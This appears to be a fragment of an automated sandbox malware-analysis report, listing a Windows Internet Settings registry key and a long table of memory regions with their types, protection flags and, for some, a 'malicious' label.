SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 400 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3477000
trusted library allocation
page read and write
malicious
7D3F000
direct allocation
page execute and read and write
malicious
20D26000
trusted library allocation
page read and write
malicious
7DDF000
direct allocation
page execute and read and write
malicious
20E9C000
trusted library allocation
page read and write
malicious
795C000
direct allocation
page execute and read and write
malicious
2BDC000
remote allocation
page execute and read and write
malicious
20CA3000
trusted library allocation
page read and write
malicious
2BAC000
remote allocation
page execute and read and write
malicious
530000
direct allocation
page execute and read and write
malicious
3548000
trusted library allocation
page read and write
malicious
3548000
trusted library allocation
page read and write
malicious
35A9000
trusted library allocation
page read and write
malicious
2C5C000
remote allocation
page execute and read and write
malicious
3C7000
heap
page read and write
544E000
stack
page read and write
950000
trusted library allocation
page read and write
24896000
trusted library allocation
page read and write
24B44000
trusted library allocation
page read and write
1FDA0000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
24EDA000
trusted library allocation
page read and write
235DD000
stack
page read and write
23BDB000
trusted library allocation
page read and write
26685000
trusted library allocation
page read and write
AA0000
trusted library allocation
page read and write
252FB000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
21DE000
stack
page read and write
10000
heap
page read and write
2946000
trusted library allocation
page read and write
4870000
heap
page read and write
20000
heap
page read and write
24135000
trusted library allocation
page read and write
238A2000
heap
page read and write
1FC30000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
5A0000
unkown
page readonly
25653000
trusted library allocation
page read and write
238C4000
heap
page read and write
25D53000
trusted library allocation
page read and write
F0000
direct allocation
page read and write
4740000
direct allocation
page read and write
2429E000
stack
page read and write
EB5000
trusted library allocation
page execute and read and write
3CE000
stack
page read and write
221C9000
trusted library allocation
page read and write
3F4000
heap
page read and write
9B0000
trusted library allocation
page read and write
30D9000
heap
page read and write
2E0000
trusted library allocation
page execute and read and write
20281000
trusted library allocation
page read and write
260F000
stack
page read and write
23B50000
trusted library allocation
page read and write
248DD000
trusted library allocation
page read and write
24149000
trusted library allocation
page read and write
25252000
trusted library allocation
page read and write
24E7B000
trusted library allocation
page read and write
4A30000
direct allocation
page read and write
30FC000
heap
page read and write
2566C000
trusted library allocation
page read and write
26509000
trusted library allocation
page read and write
239ED000
stack
page read and write
1FC9F000
stack
page read and write
1FC70000
heap
page read and write
120000
trusted library allocation
page read and write
30FA000
heap
page read and write
4C71000
heap
page read and write
1FC30000
trusted library allocation
page read and write
2453F000
trusted library allocation
page read and write
2416C000
trusted library allocation
page read and write
48B0000
heap
page read and write
2398B000
heap
page read and write
24BA3000
trusted library allocation
page read and write
261A5000
trusted library allocation
page read and write
20C3C000
stack
page read and write
246BB000
trusted library allocation
page read and write
249A1000
trusted library allocation
page read and write
2631000
trusted library allocation
page read and write
263B8000
trusted library allocation
page read and write
268FE000
stack
page read and write
AB000
stack
page read and write
4B30000
heap
page read and write
23C80000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
291A000
trusted library allocation
page read and write
B00000
trusted library allocation
page read and write
251EA000
trusted library allocation
page read and write
2097C000
heap
page read and write
24815000
trusted library allocation
page read and write
30B1000
heap
page read and write
23CBB000
trusted library allocation
page read and write
2B1E000
stack
page read and write
228CC000
trusted library allocation
page read and write
3A20000
heap
page read and write
2440A000
trusted library allocation
page read and write
1F0000
direct allocation
page read and write
23C0D000
trusted library allocation
page read and write
25F2F000
trusted library allocation
page read and write
204AD000
stack
page read and write
247C0000
trusted library allocation
page read and write
45E000
heap
page read and write
4DDE000
stack
page read and write
270CD000
trusted library allocation
page read and write
1FD10000
trusted library allocation
page read and write
23B2D000
trusted library allocation
page read and write
30FB000
heap
page read and write
24171000
trusted library allocation
page read and write
244E0000
trusted library allocation
page read and write
25238000
trusted library allocation
page read and write
25207000
trusted library allocation
page read and write
2499B000
trusted library allocation
page read and write
23995000
trusted library allocation
page read and write
4FCF000
stack
page read and write
240A9000
trusted library allocation
page read and write
2446000
trusted library allocation
page read and write
25F8E000
trusted library allocation
page read and write
D0000
direct allocation
page read and write
1FC50000
trusted library allocation
page read and write
295000
trusted library allocation
page execute and read and write
267FE000
stack
page read and write
1A0000
trusted library section
page read and write
1FD10000
trusted library allocation
page read and write
1FC2D000
stack
page read and write
23EAD000
trusted library allocation
page read and write
2321C000
stack
page read and write
23EF5000
trusted library allocation
page read and write
ADE000
stack
page read and write
1FEF0000
trusted library allocation
page read and write
2604C000
trusted library allocation
page read and write
F00000
trusted library allocation
page read and write
26E02000
trusted library allocation
page read and write
3BE0000
heap
page read and write
4790000
heap
page read and write
20280000
trusted library allocation
page read and write
2650000
trusted library allocation
page read and write
2BF7000
heap
page read and write
23E2D000
trusted library allocation
page read and write
2386E000
trusted library allocation
page read and write
1FDA0000
trusted library allocation
page read and write
2B91000
heap
page read and write
450000
trusted library allocation
page read and write
23D15000
trusted library allocation
page read and write
B10000
trusted library allocation
page read and write
4B0000
trusted library allocation
page read and write
32D000
stack
page read and write
2669D000
trusted library allocation
page read and write
25D2E000
stack
page read and write
23FCA000
trusted library allocation
page read and write
25236000
trusted library allocation
page read and write
1F7000
stack
page read and write
4730000
trusted library allocation
page read and write
47C000
heap
page read and write
1FE41000
heap
page read and write
24B35000
trusted library allocation
page read and write
BEE000
stack
page read and write
23A40000
trusted library allocation
page read and write
2331E000
stack
page read and write
2453B000
trusted library allocation
page read and write
20EA5000
trusted library allocation
page read and write
45D0000
heap
page execute and read and write
5A0000
heap
page read and write
23CEA000
trusted library allocation
page read and write
490000
trusted library allocation
page read and write
6352000
heap
page read and write
1FC50000
trusted library allocation
page read and write
250BE000
trusted library allocation
page read and write
2F7E000
trusted library allocation
page read and write
B80000
direct allocation
page read and write
24499000
trusted library allocation
page read and write
23D2E000
trusted library allocation
page read and write
1E6E000
stack
page read and write
3194000
heap
page read and write
210EC000
trusted library allocation
page read and write
1FAFF000
stack
page read and write
2329E000
stack
page read and write
24A3F000
trusted library allocation
page read and write
2603D000
trusted library allocation
page read and write
4BC1000
heap
page read and write
23942000
trusted library allocation
page read and write
24827000
trusted library allocation
page read and write
24BD3000
trusted library allocation
page read and write
246B5000
trusted library allocation
page read and write
5EBE000
stack
page read and write | page guard
55E000
stack
page read and write
2459E000
trusted library allocation
page read and write
3631000
trusted library allocation
page read and write
8C0000
trusted library allocation
page read and write
1FDF0000
trusted library allocation
page read and write
2707000
trusted library allocation
page read and write
200D0000
trusted library allocation
page read and write
27B0000
trusted library allocation
page read and write
828000
heap
page read and write
246D3000
trusted library allocation
page read and write
20080000
trusted library allocation
page read and write
2959000
trusted library allocation
page read and write
82C000
heap
page read and write
23F9B000
trusted library allocation
page read and write
200E0000
heap
page read and write
1FC50000
trusted library allocation
page read and write
266E4000
trusted library allocation
page read and write
23D8A000
trusted library allocation
page read and write
2367C000
stack
page read and write
1FC30000
trusted library allocation
page read and write
25ACC000
trusted library allocation
page read and write
242EC000
stack
page read and write
23B21000
trusted library allocation
page read and write
152000
trusted library allocation
page read and write
649C000
stack
page read and write
24B64000
trusted library allocation
page read and write
4470000
trusted library allocation
page read and write
9A0000
trusted library allocation
page read and write
20060000
trusted library allocation
page read and write
2F5D000
trusted library allocation
page read and write
4DE000
heap
page read and write
261A7000
heap
page read and write
83B000
heap
page read and write
23F14000
trusted library allocation
page read and write
836000
heap
page read and write
26F9C000
trusted library allocation
page read and write
1FD1D000
stack
page read and write
3BD000
heap
page read and write
2BED000
heap
page read and write
52E000
heap
page read and write
F0000
direct allocation
page read and write
700000
trusted library allocation
page read and write
25453000
trusted library allocation
page read and write
24D000
trusted library allocation
page execute and read and write
26F0000
trusted library allocation
page read and write
20220000
trusted library allocation
page read and write
29BC000
trusted library allocation
page read and write
20B8D000
stack
page read and write
2359E000
stack
page read and write
25680000
trusted library allocation
page read and write
24469000
trusted library allocation
page read and write
24FEE000
stack
page read and write
24D0000
trusted library allocation
page read and write
2453B000
trusted library allocation
page read and write
1FC60000
trusted library allocation
page read and write
25518000
trusted library allocation
page read and write
2465C000
trusted library allocation
page read and write
25A9D000
trusted library allocation
page read and write
5F52000
heap
page read and write
36D0000
heap
page read and write
474000
heap
page read and write
23A63000
trusted library allocation
page read and write
23EC5000
trusted library allocation
page read and write
2587B000
trusted library allocation
page read and write
221CB000
trusted library allocation
page read and write
23F2F000
trusted library allocation
page read and write
2B30000
heap
page read and write
24005000
trusted library allocation
page read and write
160000
heap
page read and write
4670000
direct allocation
page read and write
2EDD000
trusted library allocation
page read and write
23B7D000
trusted library allocation
page read and write
201C0000
trusted library allocation
page read and write
1FD10000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
4760000
direct allocation
page read and write
237A0000
heap
page read and write
2D0E000
trusted library allocation
page read and write
83E000
heap
page read and write
550000
trusted library allocation
page read and write
26024000
trusted library allocation
page read and write
1FE61000
heap
page read and write
1FC60000
trusted library allocation
page execute and read and write
1FC30000
trusted library allocation
page read and write
23CED000
trusted library allocation
page read and write
430000
heap
page read and write
245E5000
trusted library allocation
page read and write
FC0000
trusted library allocation
page read and write
24332000
trusted library allocation
page read and write
4A54000
heap
page read and write
1FBC0000
direct allocation
page read and write
26DE9000
trusted library allocation
page read and write
24AD6000
trusted library allocation
page read and write
107000
stack
page read and write
24422000
trusted library allocation
page read and write
1D54000
heap
page read and write
7DC3000
direct allocation
page execute and read and write
2F3D000
trusted library allocation
page read and write
1FBAE000
stack
page read and write
248FB000
trusted library allocation
page read and write
248CB000
trusted library allocation
page read and write
20080000
trusted library allocation
page read and write
292000
trusted library allocation
page read and write
269BE000
stack
page read and write
203FE000
stack
page read and write
2606A000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
2B0000
heap
page read and write
FC000
stack
page read and write
24568000
trusted library allocation
page read and write
20980000
heap
page execute and read and write
24EAA000
trusted library allocation
page read and write
266CC000
trusted library allocation
page read and write
2068E000
stack
page read and write
24D95000
trusted library allocation
page read and write
20000000
remote allocation
page read and write
200000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
20340000
trusted library allocation
page read and write
23C07000
trusted library allocation
page read and write
2480000
trusted library allocation
page read and write
E40000
trusted library allocation
page read and write
F0000
direct allocation
page read and write
23639000
stack
page read and write
2F87000
trusted library allocation
page read and write
82D000
heap
page read and write
24710000
heap
page read and write
1FC60000
trusted library allocation
page read and write
524E000
stack
page read and write
203C0000
trusted library allocation
page read and write
24852000
trusted library allocation
page read and write
23FB9000
trusted library allocation
page read and write
2564E000
trusted library allocation
page read and write
1FD9F000
stack
page read and write
25AE4000
trusted library allocation
page read and write
2769E000
stack
page read and write
815000
heap
page read and write
2028E000
stack
page read and write
35DC000
remote allocation
page execute and read and write
20EFD000
trusted library allocation
page read and write
850000
heap
page read and write
2BD5000
heap
page read and write
2619B000
trusted library allocation
page read and write
30A000
trusted library allocation
page execute and read and write
2554C000
trusted library allocation
page read and write
B1E000
stack
page read and write
2012E000
stack
page read and write
24DC7000
trusted library allocation
page read and write
25E0000
trusted library allocation
page read and write
FAA000
stack
page read and write
A0000
trusted library allocation
page read and write
4C1000
heap
page read and write
1D3000
trusted library allocation
page execute and read and write
BF0000
heap
page read and write
4B29000
heap
page read and write
225E000
stack
page read and write
2C13000
heap
page read and write
24A5F000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
280000
trusted library allocation
page read and write
2984000
trusted library allocation
page read and write
233BE000
stack
page read and write
206AF000
stack
page read and write
20C20000
heap
page read and write
1FC50000
trusted library allocation
page read and write
4A72000
heap
page read and write
2480000
trusted library allocation
page read and write
21FAA000
trusted library allocation
page read and write
1B0000
direct allocation
page read and write
10000
heap
page read and write
208E0000
heap
page read and write
24047000
trusted library allocation
page read and write
26D76000
trusted library allocation
page read and write
4ED0000
heap
page read and write
9A0000
trusted library allocation
page read and write
EF0000
direct allocation
page read and write
2441000
trusted library allocation
page read and write
4659000
heap
page read and write
FB0000
trusted library allocation
page read and write
3DF9000
heap
page read and write
4980000
trusted library allocation
page read and write
2660A000
trusted library allocation
page read and write
20D12000
trusted library allocation
page read and write
55B000
heap
page read and write
471000
heap
page read and write
25A56000
trusted library allocation
page read and write
3167000
heap
page read and write
20280000
trusted library allocation
page read and write
20080000
trusted library allocation
page read and write
23BF8000
trusted library allocation
page read and write
F80000
trusted library allocation
page read and write
255AB000
trusted library allocation
page read and write
918000
heap
page read and write
25B73000
trusted library allocation
page read and write
280000
trusted library allocation
page read and write
5050000
heap
page read and write
4E04000
heap
page read and write
10000
heap
page read and write
244C8000
trusted library allocation
page read and write
253A8000
trusted library allocation
page read and write
25FED000
trusted library allocation
page read and write
20010000
trusted library allocation
page read and write
3F4D000
stack
page read and write
200000
trusted library allocation
page read and write
220000
direct allocation
page read and write
3DFE000
heap
page read and write
45C000
heap
page read and write
4C8E000
stack
page read and write
24BAB000
trusted library allocation
page read and write
60D0000
heap
page read and write
5F20000
heap
page read and write
20B09000
heap
page read and write
23FA6000
trusted library allocation
page read and write
22C9D000
stack
page read and write
23BEB000
trusted library allocation
page read and write
20AD0000
heap
page read and write
23DCB000
trusted library allocation
page read and write
207E0000
heap
page read and write
62D000
stack
page read and write
24818000
trusted library allocation
page read and write
41C7000
heap
page read and write
26EC5000
trusted library allocation
page read and write
25173000
trusted library allocation
page read and write
20327000
heap
page read and write
910000
heap
page read and write
23ACA000
trusted library allocation
page read and write
1FDA7000
trusted library allocation
page read and write
23C33000
trusted library allocation
page read and write
20A80000
heap
page execute and read and write
4B37000
heap
page read and write
2C57000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
23DEF000
trusted library allocation
page read and write
2518B000
trusted library allocation
page read and write
2468B000
trusted library allocation
page read and write
4790000
direct allocation
page read and write
249E8000
trusted library allocation
page read and write
2500E000
stack
page read and write
22A000
trusted library allocation
page read and write
24AED000
trusted library allocation
page read and write
25968000
trusted library allocation
page read and write
1FC33000
trusted library allocation
page read and write
253C9000
trusted library allocation
page read and write
20240000
trusted library allocation
page read and write
20250000
trusted library allocation
page read and write
2460D000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
247E000
stack
page read and write
20210000
trusted library allocation
page execute and read and write
160000
heap
page read and write
24C0000
heap
page read and write
1FD10000
trusted library allocation
page read and write
2005D000
stack
page read and write
24149000
trusted library allocation
page read and write
25148000
trusted library allocation
page read and write
210EA000
trusted library allocation
page read and write
26190000
heap
page read and write
24815000
trusted library allocation
page read and write
20070000
trusted library allocation
page read and write
2484000
trusted library allocation
page read and write
2672B000
trusted library allocation
page read and write
25980000
trusted library allocation
page read and write
20A1E000
stack
page read and write
25555000
trusted library allocation
page read and write
2490A000
trusted library allocation
page read and write
EB1000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
4C54000
heap
page read and write
23FB9000
trusted library allocation
page read and write
25621000
trusted library allocation
page read and write
F3E000
stack
page read and write
1FC50000
trusted library allocation
page read and write
4470000
trusted library allocation
page read and write
25231000
trusted library allocation
page read and write
319000
trusted library allocation
page read and write
24B2C000
trusted library allocation
page read and write
2329C000
stack
page read and write
20000
heap
page read and write
24852000
trusted library allocation
page read and write
2E0000
trusted library allocation
page read and write
23F0C000
trusted library allocation
page read and write
20E71000
trusted library allocation
page read and write
25676000
trusted library allocation
page read and write
4E15000
heap
page read and write
30D8000
heap
page read and write
427000
trusted library allocation
page read and write
130000
trusted library allocation
page read and write
6F5C000
direct allocation
page execute and read and write
49BE000
stack
page read and write
23892000
trusted library allocation
page read and write
2B20000
heap
page read and write
82C000
heap
page read and write
25504000
trusted library allocation
page read and write
4E5E000
stack
page read and write | page guard
466000
heap
page read and write
20280000
trusted library allocation
page read and write
5D1C000
stack
page read and write
24171000
trusted library allocation
page read and write
210000
direct allocation
page read and write
24180000
trusted library allocation
page read and write
220000
direct allocation
page read and write
252AC000
trusted library allocation
page read and write
4470000
trusted library allocation
page read and write
291E000
trusted library allocation
page read and write
302000
trusted library allocation
page read and write
20C9D000
stack
page read and write
2506D000
trusted library allocation
page read and write
2180000
trusted library allocation
page read and write
23D15000
trusted library allocation
page read and write
237CA000
heap
page read and write
239E1000
trusted library allocation
page read and write
534000
heap
page read and write
2890000
trusted library allocation
page read and write
97E000
stack
page read and write
ED0000
trusted library allocation
page read and write
2C08000
trusted library allocation
page read and write
110000
trusted library allocation
page read and write
208D0000
trusted library allocation
page read and write
20460000
trusted library allocation
page read and write
1FD10000
trusted library allocation
page read and write
2B6D000
trusted library allocation
page read and write
23897000
heap
page read and write
1FE1F000
heap
page read and write
2416C000
trusted library allocation
page read and write
2AFE000
stack
page read and write
253AD000
trusted library allocation
page read and write
29D4000
trusted library allocation
page read and write
254B9000
trusted library allocation
page read and write
2B42000
heap
page read and write
23E79000
trusted library allocation
page read and write
23A1A000
trusted library allocation
page read and write
27CF000
stack
page read and write
2407C000
trusted library allocation
page read and write
2482E000
trusted library allocation
page read and write
24AD6000
trusted library allocation
page read and write
5F70000
heap
page read and write
266F000
stack
page read and write
20280000
trusted library allocation
page read and write
20370000
trusted library allocation
page read and write
23D31000
trusted library allocation
page read and write
23E71000
trusted library allocation
page read and write
2B74000
trusted library allocation
page read and write
353D000
stack
page read and write
23E1B000
trusted library allocation
page read and write
710000
trusted library allocation
page read and write
23DC0000
trusted library allocation
page read and write
23A9D000
trusted library allocation
page read and write
26A000
heap
page read and write
2070C000
heap
page read and write
492E000
unkown
page read and write
6460000
heap
page read and write
1FC97000
heap
page read and write
BCF000
stack
page read and write
23BD5000
trusted library allocation
page read and write
23E71000
trusted library allocation
page read and write
24521000
trusted library allocation
page read and write
255F9000
trusted library allocation
page read and write
A80000
trusted library allocation
page read and write
20340000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
209FB000
stack
page read and write
24818000
trusted library allocation
page read and write
AD0000
trusted library allocation
page execute and read and write
2AA000
heap
page read and write
23C8B000
trusted library allocation
page read and write
239B3000
trusted library allocation
page read and write
44FE000
stack
page read and write
804000
heap
page read and write
24BBB000
trusted library allocation
page read and write
361E000
stack
page read and write
253CE000
trusted library allocation
page read and write
AFE000
stack
page read and write
4620000
direct allocation
page read and write
30FC000
heap
page read and write
28C000
heap
page read and write
25676000
trusted library allocation
page read and write
2357C000
stack
page read and write
1FDDE000
stack
page read and write
5AD000
stack
page read and write
7EF20000
trusted library allocation
page execute and read and write
24749000
trusted library allocation
page read and write
2A10000
heap
page read and write
8B0000
trusted library allocation
page read and write
23BDF000
trusted library allocation
page read and write
25247000
trusted library allocation
page read and write
22BF000
stack
page read and write
2412B000
trusted library allocation
page read and write
3DF000
stack
page read and write
491B000
stack
page read and write
1FFCC000
stack
page read and write
3BDE000
stack
page read and write
24481000
trusted library allocation
page read and write
24509000
trusted library allocation
page read and write
348E000
stack
page read and write
4B2F000
heap
page read and write
36C0000
heap
page read and write
262E000
stack
page read and write
23DD8000
trusted library allocation
page read and write
20260000
heap
page read and write
23D2C000
trusted library allocation
page read and write
203B0000
trusted library allocation
page read and write
24E63000
trusted library allocation
page read and write
1FC0F000
stack
page read and write
250000
direct allocation
page read and write
9C0000
trusted library allocation
page read and write
250E2000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
F10000
direct allocation
page read and write
20D3E000
stack
page read and write
23923000
trusted library allocation
page read and write
23D79000
trusted library allocation
page read and write
20DCD000
trusted library allocation
page read and write
4E58000
heap
page read and write
810000
heap
page read and write
2614B000
trusted library allocation
page read and write
13A000
trusted library allocation
page read and write
23FBE000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
17DC000
remote allocation
page execute and read and write
5F20000
heap
page read and write
257F000
stack
page read and write
24833000
trusted library allocation
page read and write
26EE000
stack
page read and write
1FC50000
trusted library allocation
page read and write
2386F000
stack
page read and write
259AF000
trusted library allocation
page read and write
4EB000
heap
page read and write
245DB000
trusted library allocation
page read and write
2BDD000
heap
page read and write
26051000
trusted library allocation
page read and write
2BB5000
heap
page read and write
246EA000
trusted library allocation
page read and write
92D000
stack
page read and write
24A18000
trusted library allocation
page read and write
B80000
trusted library allocation
page execute and read and write
2505E000
stack
page read and write
2414E000
trusted library allocation
page read and write
2515B000
trusted library allocation
page read and write
23F8E000
trusted library allocation
page read and write
3590000
trusted library allocation
page read and write
2319D000
stack
page read and write
20E81000
trusted library allocation
page read and write
23F18000
trusted library allocation
page read and write
3B0000
heap
page read and write
2077F000
stack
page read and write
4F3000
heap
page read and write
3FDC000
remote allocation
page execute and read and write
26E1B000
trusted library allocation
page read and write
250C8000
trusted library allocation
page read and write
25178000
trusted library allocation
page read and write
2483000
trusted library allocation
page read and write
24B4C000
trusted library allocation
page read and write
23F0F000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
25685000
trusted library allocation
page read and write
25626000
trusted library allocation
page read and write
234EC000
stack
page read and write
25D4E000
trusted library allocation
page read and write
23D47000
trusted library allocation
page read and write
467000
heap
page read and write
23CA3000
trusted library allocation
page read and write
317000
trusted library allocation
page execute and read and write
26EF000
stack
page read and write
24D9000
trusted library allocation
page read and write
2401D000
trusted library allocation
page read and write
E4000
trusted library allocation
page read and write
250FC000
trusted library allocation
page read and write
23BF5000
trusted library allocation
page read and write
23D33000
trusted library allocation
page read and write
25F34000
trusted library allocation
page read and write
606E000
stack
page read and write
20E41000
trusted library allocation
page read and write
E59000
trusted library allocation
page read and write
252BF000
trusted library allocation
page read and write
23D1A000
trusted library allocation
page read and write
45C000
heap
page read and write
205AF000
stack
page read and write
485000
heap
page read and write
1FDE0000
heap
page read and write
2044C000
stack
page read and write
2584B000
trusted library allocation
page read and write
2490000
trusted library allocation
page read and write
2453D000
trusted library allocation
page read and write
655C000
direct allocation
page execute and read and write
203B7000
trusted library allocation
page read and write
1FDAF000
trusted library allocation
page read and write
23B4B000
trusted library allocation
page read and write
2406D000
trusted library allocation
page read and write
20C61000
trusted library allocation
page read and write
A4E000
stack
page read and write | page guard
23FD2000
trusted library allocation
page read and write
365E000
stack
page read and write
24615000
trusted library allocation
page read and write
287D000
trusted library allocation
page read and write
238AC000
heap
page read and write
23FBE000
trusted library allocation
page read and write
2043E000
stack
page read and write
2553D000
trusted library allocation
page read and write
245DD000
trusted library allocation
page read and write
23D5B000
trusted library allocation
page read and write
2430E000
trusted library allocation
page read and write
205AF000
stack
page read and write
8C0000
trusted library allocation
page read and write
2410A000
trusted library allocation
page read and write
20A7D000
stack
page read and write
24848000
trusted library allocation
page read and write
23FCD000
trusted library allocation
page read and write
2678A000
trusted library allocation
page read and write
2035E000
stack
page read and write
1FC50000
trusted library allocation
page read and write
8D0000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
24607000
trusted library allocation
page read and write
506D000
stack
page read and write
21ED3000
trusted library allocation
page read and write
20350000
trusted library allocation
page read and write
25395000
trusted library allocation
page read and write
24318000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
25F66000
trusted library allocation
page read and write
1FC31000
trusted library allocation
page read and write
3949000
trusted library allocation
page read and write
20010000
trusted library allocation
page read and write
25F4D000
trusted library allocation
page read and write
234CF000
stack
page read and write
21E41000
trusted library allocation
page read and write
23D33000
trusted library allocation
page read and write
F8D000
stack
page read and write
1FC50000
trusted library allocation
page read and write
2180000
trusted library allocation
page read and write
A4000
trusted library allocation
page read and write
ACE000
stack
page read and write
4B10000
direct allocation
page read and write
54A000
heap
page read and write
242F5000
trusted library allocation
page read and write
4510000
direct allocation
page read and write
10000
heap
page read and write
1FD10000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
B13000
trusted library allocation
page read and write
54C0000
heap
page read and write
206DF000
stack
page read and write
25EE9000
trusted library allocation
page read and write
2380C000
stack
page read and write
4642000
heap
page read and write
4970000
trusted library allocation
page read and write
25219000
trusted library allocation
page read and write
236CC000
stack
page read and write
4C0000
heap
page read and write
A10000
trusted library allocation
page read and write
7C0000
heap
page read and write
23BF3000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
23A40000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
2358E000
stack
page read and write
1FDF0000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
25072000
trusted library allocation
page read and write
5BB000
unkown
page readonly
23F00000
trusted library allocation
page read and write
34A000
heap
page read and write
252E8000
trusted library allocation
page read and write
22F4F000
stack
page read and write
98C000
trusted library allocation
page read and write
23F24000
trusted library allocation
page read and write
2092F000
heap
page read and write
6740000
heap
page read and write
23D52000
trusted library allocation
page read and write
4920000
trusted library allocation
page read and write
EA0000
direct allocation
page read and write
5D5D000
stack
page read and write
1FC51000
trusted library allocation
page read and write
3CF000
heap
page read and write
510000
trusted library allocation
page read and write
2567B000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
24838000
trusted library allocation
page read and write
4F02000
heap
page read and write
B6E000
stack
page read and write
254EB000
trusted library allocation
page read and write
23B78000
trusted library allocation
page read and write
45D6000
heap
page execute and read and write
530000
heap
page read and write
25043000
trusted library allocation
page read and write
2E68000
trusted library allocation
page read and write
24318000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
245F8000
trusted library allocation
page read and write
2531D000
trusted library allocation
page read and write
2064E000
stack
page read and write
23B7A000
trusted library allocation
page read and write
2BF0000
heap
page read and write
1FC50000
trusted library allocation
page read and write
EA8000
trusted library allocation
page read and write
2C0F000
heap
page read and write
14A000
trusted library allocation
page execute and read and write
1FC50000
trusted library allocation
page read and write
20220000
trusted library allocation
page read and write
5A5000
unkown
page readonly
5E5D000
stack
page read and write
1FFD2000
heap
page read and write
90F000
stack
page read and write
23DC0000
trusted library allocation
page read and write
4F2E000
stack
page read and write
25DE0000
trusted library allocation
page read and write
4DE7000
heap
page read and write
830000
heap
page read and write
2404C000
trusted library allocation
page read and write
4500000
direct allocation
page read and write
2551D000
trusted library allocation
page read and write
4470000
trusted library allocation
page read and write
27C0000
trusted library allocation
page read and write
20B4A000
heap
page read and write
22249000
trusted library allocation
page read and write
23B39000
trusted library allocation
page read and write
249D0000
trusted library allocation
page read and write
23C98000
trusted library allocation
page read and write
1FE2F000
heap
page read and write
4B37000
heap
page read and write
252EB000
trusted library allocation
page read and write
1FDED000
stack
page read and write
2660D000
trusted library allocation
page read and write
503E000
stack
page read and write
2542F000
trusted library allocation
page read and write
23C4E000
stack
page read and write
394000
heap
page execute and read and write
23A61000
trusted library allocation
page read and write
4E49000
heap
page read and write
265AF000
trusted library allocation
page read and write
26656000
trusted library allocation
page read and write
20F5A000
trusted library allocation
page read and write
25249000
trusted library allocation
page read and write
2C02000
heap
page read and write
20010000
trusted library allocation
page read and write
630000
heap
page read and write
20280000
trusted library allocation
page read and write
23D2E000
trusted library allocation
page read and write
20120000
trusted library allocation
page read and write
5F34000
heap
page read and write
1FC30000
trusted library allocation
page read and write
23D77000
trusted library allocation
page read and write
2C13000
heap
page read and write
5E00000
heap
page read and write
1FC50000
trusted library allocation
page read and write
5E9E000
stack
page read and write
F20000
trusted library allocation
page read and write
26E8E000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
23C03000
trusted library allocation
page read and write
23AC8000
trusted library allocation
page read and write
4102000
heap
page read and write
4E2E000
stack
page read and write | page guard
20280000
trusted library allocation
page read and write
2BE0000
heap
page read and write
828000
heap
page read and write
ED0000
trusted library allocation
page execute and read and write
222CB000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
24C8D000
trusted library allocation
page read and write
A4E000
stack
page read and write
1FC30000
trusted library allocation
page read and write
24731000
trusted library allocation
page read and write
28A000
trusted library allocation
page execute and read and write
860000
trusted library allocation
page execute and read and write
20230000
trusted library allocation
page read and write
4FA0000
heap
page read and write
AE0000
trusted library allocation
page execute and read and write
20087000
trusted library allocation
page read and write
2B3E000
heap
page read and write
45A0000
direct allocation
page read and write
26539000
trusted library allocation
page read and write
1FC61000
trusted library allocation
page read and write
1FEF0000
trusted library allocation
page read and write
254D2000
trusted library allocation
page read and write
1FF60000
trusted library allocation
page read and write
20A90000
heap
page read and write
258DA000
trusted library allocation
page read and write
25233000
trusted library allocation
page read and write
23D61000
trusted library allocation
page read and write
5D70000
heap
page read and write
1F0000
heap
page read and write
23F28000
trusted library allocation
page read and write
259DF000
trusted library allocation
page read and write
F70000
heap
page execute and read and write
260B0000
trusted library allocation
page read and write
A00000
trusted library allocation
page read and write
26C67000
trusted library allocation
page read and write
23E79000
trusted library allocation
page read and write
1A0000
direct allocation
page read and write
200D0000
direct allocation
page read and write
39FF000
stack
page read and write
25356000
trusted library allocation
page read and write
4EBF000
stack
page read and write
26DEE000
trusted library allocation
page read and write
252CB000
trusted library allocation
page read and write
22E10000
heap
page read and write
23D05000
trusted library allocation
page read and write
26CE0000
trusted library allocation
page read and write
42B000
heap
page read and write
5DBE000
stack
page read and write
244F8000
trusted library allocation
page read and write
24C4E000
trusted library allocation
page read and write
23E1D000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
C0D000
heap
page read and write
9FE000
stack
page read and write
41A0000
heap
page read and write
1FC60000
trusted library allocation
page read and write
23A98000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
2BFF000
heap
page read and write
2F57000
trusted library allocation
page read and write
24F50000
trusted library allocation
page read and write
3596000
trusted library allocation
page read and write
5E04000
heap
page read and write
337000
heap
page read and write
23982000
trusted library allocation
page read and write
24A47000
trusted library allocation
page read and write
46A5000
heap
page read and write
25939000
trusted library allocation
page read and write
202F0000
trusted library allocation
page read and write
239C7000
trusted library allocation
page read and write
248AD000
trusted library allocation
page read and write
248A0000
trusted library allocation
page read and write
4AC7000
heap
page read and write
20010000
trusted library allocation
page read and write
205FB000
stack
page read and write
2D0000
trusted library allocation
page read and write
26F6A000
trusted library allocation
page read and write
4E9E000
stack
